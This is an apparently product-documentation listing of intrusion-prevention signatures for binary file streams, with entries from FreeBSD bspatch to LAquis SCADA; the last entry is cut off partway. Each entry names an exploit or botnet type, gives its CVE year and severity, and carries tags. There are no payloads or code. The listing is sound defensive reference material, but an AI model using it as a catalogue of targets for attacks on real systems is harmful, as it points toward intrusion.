File-Binary_FreeBSD-Bspatch-Utility-Remote-Code-Execution

About this situation: An attempt to exploit a vulnerability in FreeBSD Project FreeBSD detected
Context: Other Binary File Stream
Severity: 7
Tags: FreeBSD, Any Hardware, CVE2014, FreeBSD not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-783-5211
Last changed: sgpkg-ips-783-5211
Vulnerability: FreeBSD-Bspatch-Utility-Remote-Code-Execution
Description:
Back to top

File-Binary_Freetype-Heap-Buffer-Overflow-CVE-2020-15999

About this situation: An attempt to exploit a vulnerability in Freetype font rendering library detected
Context: Other Binary File Stream
Severity: 10
Tags: Any Operating System, Any Hardware, Chrome, CVE2020, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1290-5242
Last changed: sgpkg-ips-1336-5242
Vulnerability: Freetype-Heap-Buffer-Overflow-CVE-2020-15999
Description:
Back to top

File-Binary_Fuji-Electric-V-Server-Heap-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Fuji Electric V-server detected
Context: Other Binary File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Fuji Electric V-Server, CVE2019, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1228-5242
Last changed: sgpkg-ips-1228-5242
Vulnerability: Fuji-Electric-V-Server-Heap-Buffer-Overflow
Description:
Back to top

File-Binary_GD-Library-Libgd-gd2getheader-Integer-Overflow

About this situation: An attempt to exploit a vulnerability in GD Library libgd detected
Context: Other Binary File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, GD Graphics Library, CVE2016, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-790-5211
Last changed: sgpkg-ips-790-5211
Vulnerability: GD-Library-Libgd-gd2getheader-Integer-Overflow
Description:
Back to top

File-Binary_GD-Library-Libgd-GD_gd2.c-Heap-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in GD Library libgd detected
Context: Other Binary File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, GD Graphics Library, CVE2016, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-766-5211
Last changed: sgpkg-ips-766-5211
Vulnerability: GD-Library-Libgd-Heap-Buffer-Overflow-CVE-2016-3074
Description:
Back to top

File-Binary_GE-Mds-Pulsenet-Spring-Remoting-Httpinvoker-Insecure-Deserialization

About this situation: An attempt to exploit a vulnerability in General Electric MDS PulseNET detected
Context: Other Binary File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, General Electric MDS PulseNET, CVE2018, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1081-5242
Last changed: sgpkg-ips-1081-5242
Vulnerability: GE-Mds-Pulsenet-Spring-Remoting-Httpinvoker-Insecure-Deserialization
Description:
Back to top

File-Binary_GIMP-Psp-Image-Color-Palette-Block-Parsing-Integer-Overflow

About this situation: An attempt to exploit a vulnerability in GIMP detected
Context: Other Binary File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, GIMP, CVE2023, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1684-5242
Last changed: sgpkg-ips-1684-5242
Vulnerability: GIMP-Psp-Image-Color-Palette-Block-Parsing-Integer-Overflow
Description:
Back to top

File-Binary_GIMP-XWD-File-Handling-Heap-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in GNU GIMP detected
Context: Other Binary File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, GIMP, CVE2013, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-556-5211
Last changed: sgpkg-ips-556-5211
Vulnerability: GIMP-XWD-File-Handling-Heap-Buffer-Overflow
Description:
Back to top

File-Binary_GIMP-XWD-File-Handling-Stack-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in GNU GIMP detected
Context: Other Binary File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, GIMP, CVE2012, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-499-5211
Last changed: sgpkg-ips-499-5211
Vulnerability: GIMP-XWD-File-Handling-Stack-Buffer-Overflow
Description:
Back to top

File-Binary_Git-Client-Path-Validation-Command-Execution

About this situation: An attempt to exploit a vulnerability in GIT GIT detected
Context: Other Binary File Stream
Severity: 2
Tags: Any Operating System, Any Hardware, Git, CVE2014, Any Operating System not specific, Suspected Compromise
First detected in: sgpkg-ips-633-5211
Last changed: sgpkg-ips-1790-5242
Vulnerability: Git-Client-Path-Validation-Command-Execution
Description:
Back to top

File-Binary_Git-Source-Code-Management-Improper-Link-Resolution

About this situation: An attempt to exploit a vulnerability in Git Source Code Management detected.
Context: Other Binary File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Git, CVE2021, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1364-5242
Last changed: sgpkg-ips-1431-5242
Vulnerability: Git-Source-Code-Management-Improper-Link-Resolution
Description:
Back to top

File-Binary_Git-SSH-Url-Processing-Command-Execution

About this situation: An attempt to exploit a vulnerability in GIT GIT detected
Context: Other Binary File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Git, CVE2017, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1075-5242
Last changed: sgpkg-ips-1075-5242
Vulnerability: Git-SSH-Url-Processing-Command-Execution
Description:
Back to top

File-Binary_Git-Submodules-Directory-Traversal

About this situation: An attempt to exploit a vulnerability in GIT detected
Context: Other Binary File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Git, CVE2018, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1136-5242
Last changed: sgpkg-ips-1136-5242
Vulnerability: Git-Submodules-Directory-Traversal
Description:
Back to top

File-Binary_Gitlab-Arbitrary-File-Write

About this situation: An attempt to exploit a vulnerability in GitLab detected
Context: Other Binary File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, GitLab, CVE2018, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1141-5242
Last changed: sgpkg-ips-1141-5242
Vulnerability: Gitlab-Arbitrary-File-Write
Description:
Back to top

File-Binary_Gnu-GIMP-DDS-Image-Parsing-Heap-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in The GIMP Team GIMP detected
Context: Other Binary File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, GIMP, CVE2023, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1697-5242
Last changed: sgpkg-ips-1698-5242
Vulnerability: Gnu-GIMP-DDS-Image-Parsing-Heap-Buffer-Overflow
Description:
Back to top

File-Binary_Gnu-GIMP-Psd-Image-Channel-Data-Parsing-Heap-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in GIMP detected
Context: Other Binary File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, GIMP, CVE2023, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1717-5242
Last changed: sgpkg-ips-1717-5242
Vulnerability: Gnu-GIMP-Psd-Image-Channel-Data-Parsing-Heap-Buffer-Overflow
Description:
Back to top

File-Binary_Gnu-GIMP-Psp-Image-Channel-Block-Parsing-Off-By-One-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in GIMP detected
Context: Other Binary File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, GIMP, CVE2023, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1710-5242
Last changed: sgpkg-ips-1846-5242
Vulnerability: Gnu-GIMP-Psp-Image-Channel-Block-Parsing-Off-By-One-Buffer-Overflow
Description:
Back to top

File-Binary_Gnu-Gzip-Lzh-Decompression-Make_Table-Stack-Modification

About this situation: An attempt to exploit a vulnerability in Free Software Foundation gzip detected
Context: Other Binary File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, gzip, CVE2006, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-973-5242
Last changed: sgpkg-ips-973-5242
Vulnerability: Gnu-Gzip-Lzh-Decompression-Make_Table-Stack-Modification
Description:
Back to top

File-Binary_Gnu-Libextractor-Zip-File-Comment-Out-Of-Bounds-Read

About this situation: An attempt to exploit a vulnerability in GNU Libextractor detected
Context: Other Binary File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, GNU Libextractor, CVE2018, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1105-5242
Last changed: sgpkg-ips-1858-5242
Vulnerability: Gnu-Libextractor-Zip-File-Comment-Out-Of-Bounds-Read
Description:
Back to top

File-Binary_Gnu-Tar-From_Header-Out-Of-Bounds-Read

About this situation: An attempt to exploit a vulnerability in GNU Tar detected.
Context: Other Binary File Stream
Severity: 7
Tags: Linux, Any Hardware, GNU Tar, CVE2022, Linux not specific, Suspected Disclosure, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1566-5242
Last changed: sgpkg-ips-1566-5242
Vulnerability: Gnu-Tar-From_Header-Out-Of-Bounds-Read
Description:
Back to top

File-Binary_Gnu-Tar-PAX-Extended-Headers-Handling-Buffer-Overflow

About this situation: Detects Gnu Tar PAX Extended Headers Handling Buffer Overflow exploits
Context: Other Binary File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, GNU Tar, CVE2006, Any Operating System not specific, Denial of Service, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-487-5211
Vulnerability: Generic-Gnu-Tar-PAX-Extended-Headers-Handling-Buffer-Overflow
Description:
Back to top

File-Binary_Google-Chrome-CRX-Extension-Package

About this situation: Detected a download attempt of an executable content
Context: Other Binary File Stream
Severity: 2
Tags: Any Operating System, Any Hardware, Chrome, Any Operating System not specific, Possibly Unwanted Content, Program File
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-591-5211
Vulnerability: Google-Chrome-Extension-Package
File-Type-Identification
Description:
Back to top

File-Binary_Google-Chrome-Skia-Integer-Overflow-CVE-2023-6345

About this situation: An attempt to exploit a vulnerability in Google Chrome detected
Context: Other Binary File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Chrome, CVE2023, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1828-5242
Last changed: sgpkg-ips-1828-5242
Vulnerability: Google-Chrome-Skia-Integer-Overflow-CVE-2023-6345
Description:
Back to top

File-Binary_Google-Chrome-Uninitialized-BugReport-Pointer

About this situation: An attempt to exploit a vulnerability in Google Google Chrome detected
Context: Other Binary File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Chrome, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-410-4219
Last changed: sgpkg-ips-1336-5242
Vulnerability: Google-Chrome-Uninitialized-BugReport-Pointer-Code-Execution
Description:
Back to top

File-Binary_Gzip-Compressed-File-Download

About this situation: Attempt to download a gzip compressed file detected
Context: Other Binary File Stream
Severity: 2
Tags: Any Operating System, Any Hardware, gzip, Any Operating System not specific, Possibly Unwanted Content, Archive
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1089-5242
Vulnerability: Gzip-Compressed-File
File-Type-Identification
Description:
Back to top

File-Binary_Gzip-Compressed-File-Upload

About this situation: Attempt to upload a gzip compressed file detected
Context: Other Binary File Stream
Severity: 2
Tags: Any Operating System, Any Hardware, gzip, Any Operating System not specific, Possibly Unwanted Content
First detected in: sgpkg-ips-1089-5242
Last changed: sgpkg-ips-1089-5242
Vulnerability: Gzip-Compressed-File
File-Type-Identification
Description:
Back to top

File-Binary_Gzip-Compressed-File-With-Invalid-CRC

About this situation: A Gzip compressed file with an invalid CRC in the headers detected
Context: Other Binary File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, gzip, Any Operating System not specific, Attack Related Anomalies, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-945-5242
Last changed: sgpkg-ips-1173-5242
Vulnerability: Gzip-Compressed-File
Description:
Back to top

File-Binary_Gzip-Compressed-File-With-Reserved-Flag-Bit-Set

About this situation: A Gzip compressed file with a reserved flag bit set detected
Context: Other Binary File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, gzip, Any Operating System not specific, Attack Related Anomalies, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-945-5242
Last changed: sgpkg-ips-1173-5242
Vulnerability: Gzip-Compressed-File
Description:
Back to top

File-Binary_HPE-7-Zip-Rar-Solid-Compression-Remote-Code-Execution

About this situation: An attempt to exploit a vulnerability in 7-Zip RAR detected
Context: Other Binary File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, 7-Zip, CVE2018, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1150-5242
Last changed: sgpkg-ips-1398-5242
Vulnerability: 7-Zip-Rar-Solid-Compression-Remote-Code-Execution
Description:
Back to top

File-Binary_HPE-IMC-Topomsgservlet-Classname-Expression-Language-Injection

About this situation: An attempt to exploit a vulnerability in HP Intelligent Management Center detected
Context: Other Binary File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, HP Intelligent Management Center, CVE2019, Any Operating System not specific, HP Intelligent Management Center not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1180-5242
Last changed: sgpkg-ips-1183-5242
Vulnerability: HPE-IMC-Topomsgservlet-Classname-Expression-Language-Injection
Description:
Back to top

File-Binary_HPE-Intelligent-Management-Center-Accessmgrservlet-Classname-Insecure-Deserialization

About this situation: An attempt to exploit a vulnerability in HP Intelligent Management Center detected
Context: Other Binary File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, HP Intelligent Management Center, CVE2019, Any Operating System not specific, HP Intelligent Management Center not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1166-5242
Last changed: sgpkg-ips-1166-5242
Vulnerability: HPE-IMC-Accessmgrservlet-Classname-Insecure-Deserialization
Description:
Back to top

File-Binary_HPE-Intelligent-Management-Center-Perfaccessmgrservlet-Insecure-Deserialization

About this situation: An attempt to exploit a vulnerability in HP Intelligent Management Center detected
Context: Other Binary File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, HP Intelligent Management Center, CVE2017, Any Operating System not specific, HP Intelligent Management Center not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1044-5242
Last changed: sgpkg-ips-1759-5242
Vulnerability: HPE-Intelligent-Management-Center-Perfaccessmgrservlet-Insecure-Deserialization
Description:
Back to top

File-Binary_HPE-Intelligent-Management-Center-Topodebugservlet-Insecure-Deserialization

About this situation: An attempt to exploit a vulnerability in HP Intelligent Management Center detected
Context: Other Binary File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, HP Intelligent Management Center, Any Operating System not specific, HP Intelligent Management Center not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1145-5242
Last changed: sgpkg-ips-1145-5242
Vulnerability: HPE-Intelligent-Management-Center-Topodebugservlet-Insecure-Deserialization
Description:
Back to top

File-Binary_HPE-Network-Automation-RPCServlet-Insecure-Deserialization

About this situation: An attempt to exploit a vulnerability in HPE Network Automation detected
Context: Other Binary File Stream
Severity: 7
Tags: Windows, Any Hardware, HPE Network Automation, CVE2016, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-836-5242
Last changed: sgpkg-ips-836-5242
Vulnerability: HPE-Network-Automation-RPCServlet-Insecure-Deserialization
Description:
Back to top

File-Binary_HTTP-404-With-Binary-Content

About this situation: Detected a suspicious Binary file
Context: Other Binary File Stream
Severity: 2
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Other Suspicious Traffic, Anomalies
First detected in: sgpkg-ips-903-5242
Last changed: sgpkg-ips-903-5242
Description:
Back to top

File-Binary_IBM-Domino-Image-File-Parsing-CVE-2015-5040-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in IBM Domino detected
Context: Other Binary File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, IBM Domino, CVE2015, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-717-5211
Last changed: sgpkg-ips-719-5211
Vulnerability: IBM-Domino-Image-File-Parsing-CVE-2015-5040-Buffer-Overflow
Description:
Back to top

File-Binary_IBM-Java-Com.ibm.rmi.util.proxyutil-Sandbox-Breach

About this situation: An attempt to exploit a vulnerability in IBM Java detected
Context: Other Binary File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, IBM Java, CVE2012, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-973-5242
Last changed: sgpkg-ips-973-5242
Vulnerability: IBM-Java-Com.ibm.rmi.util.proxyutil-Sandbox-Breach
Description:
Back to top

File-Binary_IBM-Java-Java.lang.classloader.defineclass-Sandbox-Breach

About this situation: An attempt to exploit a vulnerability in IBM Java detected
Context: Other Binary File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, IBM Java, CVE2012, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-561-5211
Last changed: sgpkg-ips-561-5211
Vulnerability: IBM-Java-Java.lang.classloader.defineclass-Sandbox-Breach
Description:
Back to top

File-Binary_IBM-Java-Multiple-Packages-Sandbox-Breach

About this situation: An attempt to exploit a vulnerability in IBM Java detected
Context: Other Binary File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, IBM Java, CVE2012, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-561-5211
Last changed: sgpkg-ips-561-5211
Vulnerability: IBM-Java-Multiple-Packages-Sandbox-Breach
Description:
Back to top

File-Binary_IBM-Lotus-Domino-BMP-Color-Palette-Stack-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in IBM Domino detected
Context: Other Binary File Stream
Severity: 10
Tags: Any Operating System, Any Hardware, IBM Domino, IBM Notes And Domino, CVE2015, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-670-5211
Last changed: sgpkg-ips-670-5211
Vulnerability: IBM-Lotus-Domino-BMP-Color-Palette-Stack-Buffer-Overflow
Description:
Back to top

File-Binary_IBM-Lotus-Domino-BMP-Parsing-Integer-Overflow

About this situation: An attempt to exploit a vulnerability in IBM Domino detected
Context: Other Binary File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, IBM Lotus Notes, IBM Domino, CVE2015, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-675-5211
Last changed: sgpkg-ips-695-5211
Vulnerability: IBM-Lotus-Domino-BMP-Parsing-Integer-Overflow
Description:
Back to top

File-Binary_IBM-Lotus-Notes-1-2-3-Work-Sheet-File-Viewer-Buffer-Overflow

About this situation: An attempt to exploit buffer overflow vulnerability in IBM Lotus Notes detected
Context: Other Binary File Stream
Severity: 7
Tags: Windows, Any Hardware, Lotus Notes, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-524-5211
Vulnerability: IBM-Lotus-Notes-1-2-3-Work-Sheet-File-Viewer-Buffer-Overflow
Description:
Back to top

File-Binary_IBM-Lotus-Notes-Doc-Attachment-Viewer-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in IBM Lotus Notes detected
Context: Other Binary File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Lotus Notes, CVE2007, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-436-4219
Last changed: sgpkg-ips-436-4219
Vulnerability: IBM-Lotus-Notes-Doc-Attachment-Viewer-Buffer-Overflow
Description:
Back to top

File-Binary_IBM-Lotus-Notes-WPD-Attachment-Handling-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in IBM Lotus Notes detected
Context: Other Binary File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, IBM Lotus Notes, CVE2008, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-605-5211
Last changed: sgpkg-ips-680-5211
Vulnerability: IBM-Lotus-Notes-WPD-Attachment-Handling-Buffer-Overflow
Description:
Back to top

File-Binary_Imagemagick-Psd-File-Channel-Buffer-Vulnerability

About this situation: Invalid PSD file download detected
Context: Other Binary File Stream
Severity: 10
Tags: Any Operating System, Any Hardware, Imagemagick, CVE2005, Any Operating System not specific, Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1531-5242
Vulnerability: Psd-Imagemagick-Psd-File-Channel-Buffer-Vulnerability
Description:
Back to top

File-Binary_Imagemagick-Sgi-File-Malformed-BPC-Field-Handling-Buffer-Overflow

About this situation: Detects buffer overflow exploits against ImageMagick SGI decoder component
Context: Other Binary File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Imagemagick, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1531-5242
Vulnerability: HTTP-Imagemagick-Sgi-File-Malformed-BPC-Field-Handling-Buffer-Overflow
Description:
Back to top

File-Binary_Imagemagick-Sgi-File-Malformed-ZSIZE-Field-Handling-Buffer-Overflow

About this situation: Detects buffer overflow exploits against ImageMagick SGI decoder component
Context: Other Binary File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Imagemagick, CVE2006, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1531-5242
Vulnerability: HTTP-Imagemagick-Sgi-File-Malformed-ZSIZE-Field-Handling-Buffer-Overflow
Description:
Back to top

File-Binary_Inductive-Automation-Ignition-Servermessage-Insecure-Deserialization

About this situation: An attempt to exploit a vulnerability in Inductive Automation Ignition detected
Context: Other Binary File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Inductive Automation Ignition, CVE2022, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1580-5242
Last changed: sgpkg-ips-1684-5242
Vulnerability: Inductive-Automation-Ignition-Servermessage-Insecure-Deserialization
Description:
Back to top

File-Binary_Interactive-Data-Esignal-Stack-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Interactive Data eSignal detected
Context: Other Binary File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Interactive Data eSignal, CVE2011, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-973-5242
Last changed: sgpkg-ips-973-5242
Vulnerability: Interactive-Data-Esignal-StyleTemplate-Buffer-Overflow
Description:
Back to top

File-Binary_Internet-Explorer-BMP-BOF

About this situation: An attempt to exploit a vulnerability in Microsoft Internet Explorer detected
Context: Other Binary File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer, MS2004-07, CVE2004, Windows not specific, Internet Explorer not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-409-4219
Last changed: sgpkg-ips-841-5242
Vulnerability: Microsoft-Internet-Explorer-Malformed-BMP-File-Buffer-Overrun-Vulnerability
Description:
Back to top

File-Binary_Internet-Explorer-Memory-Corruption-Vulnerability-CVE-2021-26411

About this situation: An attempt to exploit a vulnerability in Internet Explorer detected
Context: Other Binary File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer, MS2021-03, CVE2021, Windows not specific, Internet Explorer not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1697-5242
Last changed: sgpkg-ips-1697-5242
Vulnerability: Internet_Explorer_Memory_Corruption_Vulnerability_CVE-2021-26411
Description:
Back to top

File-Binary_Invalid-Content-Type-For-VideoLAN-VLC-Media-Player

About this situation: An attempt to exploit a vulnerability in VideoLAN VLC Media Player detected
Context: Other Binary File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, VideoLAN VLC, CVE2011, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-410-4219
Last changed: sgpkg-ips-493-5211
Vulnerability: VideoLAN-VLC-Media-Player-Subtitle-Striptags-Heap-Buffer-Overflow
Description:
Back to top

File-Binary_Java-Archive-File-Upload

About this situation: An attempt to upload Java archive file detected
Context: Other Binary File Stream
Severity: 2
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Possibly Unwanted Content
First detected in: sgpkg-ips-1112-5242
Last changed: sgpkg-ips-1714-5242
Vulnerability: Java-Archive-File-Upload
Description:
Back to top

File-Binary_Java-Class-File

About this situation: Detected a download attempt of a Java class file
Context: Other Binary File Stream
Severity: 2
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Possibly Unwanted Content, Program File
First detected in: sgpkg-ips-473-5211
Last changed: sgpkg-ips-591-5211
Vulnerability: File-Type-Identification
Java-Related-File-Transfers
Description:
Back to top

File-Binary_Java-Color-Management-Component-Remote-Code-Execution

About this situation: An attack against Oracle Java Runtime Environment detected
Context: Other Binary File Stream
Severity: 7
Tags: Windows, x86, Oracle Java Runtime Environment, CVE2013, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-598-5211
Last changed: sgpkg-ips-598-5211
Vulnerability: Java-Color-Management-Component-Remote-Code-Execution
Description:
Back to top

File-Binary_Java-Java.util.concurrent.concurrenthashmap-Memory-Corruption

About this situation: An attempt to exploit a vulnerability in Oracle Java Development Kit (JDK) detected
Context: Other Binary File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Oracle Java Runtime Environment, Oracle Java Development Kit, CVE2013, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-561-5211
Last changed: sgpkg-ips-561-5211
Vulnerability: Oracle-Java-Java.util.concurrent.concurrenthashmap-Memory-Corruption
Description:
Back to top

File-Binary_Java-SE-Gsub-Featurecount-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Oracle Java Runtime Environment (JRE) detected
Context: Other Binary File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Oracle Java Runtime Environment, Oracle Java Development Kit, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-561-5211
Last changed: sgpkg-ips-561-5211
Vulnerability: Oracle-Java-SE-Gsub-Featurecount-Buffer-Overflow
Description:
Back to top

File-Binary_Jenkins-Arbitrary-File-Read-CVE-2024-23897

About this situation: An attempt to exploit a vulnerability in Jenkins detected
Context: Other Binary File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Jenkins, CVE2024, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1685-5242
Last changed: sgpkg-ips-1693-5242
Vulnerability: Jenkins-Arbitrary-File-Read-CVE-2024-23897
Description:
Back to top

File-Binary_Keysight-N6854a-And-N6841a-RF-Addlicensefile-Directory-Traversal

About this situation: An attempt to exploit a vulnerability in KeySight N6854A and N6841A RF detected
Context: Other Binary File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, KeySight N6854A and N6841A RF, CVE2022, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1520-5242
Last changed: sgpkg-ips-1520-5242
Vulnerability: Keysight-N6854a-And-N6841a-RF-Addlicensefile-Directory-Traversal
Description:
Back to top

File-Binary_Kronos-Botnet-Traffic

About this situation: Kronos botnet traffic detected
Context: Other Binary File Stream
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Botnet, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-760-5211
Last changed: sgpkg-ips-760-5211
Vulnerability: Kronos-Botnet
Description:
Back to top

File-Binary_Kuluoz-Botnet-Traffic

About this situation: Kuluoz botnet traffic detected
Context: Other Binary File Stream
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Botnet, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1125-5242
Last changed: sgpkg-ips-1125-5242
Vulnerability: Botnet-Kuluoz
Description:
Back to top

File-Binary_Laquis-SCADA-LGX-Report-Addcombofile-Arbitrary-File-Write

About this situation: An attempt to exploit a vulnerability in LAquis SCADA detected
Context: Other Binary File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, LAquis SCADA, CVE2024, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1801-5242
Last changed: sgpkg-ips-1801-5242
Vulnerability: Laquis-SCADA-LGX-Report-Addcombofile-Arbitrary-File-Write
Description:
Back to top

File-Binary_Laquis-SCADA-LGX-Report-Arbitrary-File-Write

About this situation: An attempt to exploit a vulnerability in LAquis SCADA detected
Context: Other Binary File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, LAquis SCADA, CVE2018, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1167-5242
Last changed: sgpkg-ips-1167-5242
Vulnerability: Laquis-SCADA-LGX-Report-Arbitrary-File-Write
Description:
Back to top

File-Binary_Laquis-Scada-LGX-Report-File-Parsing-Out-of-Bounds-Write

About this situation: An attempt to exploit a vulnerability in LAquis SCADA detected
Context: Other Binary File Stream
Severity: 7
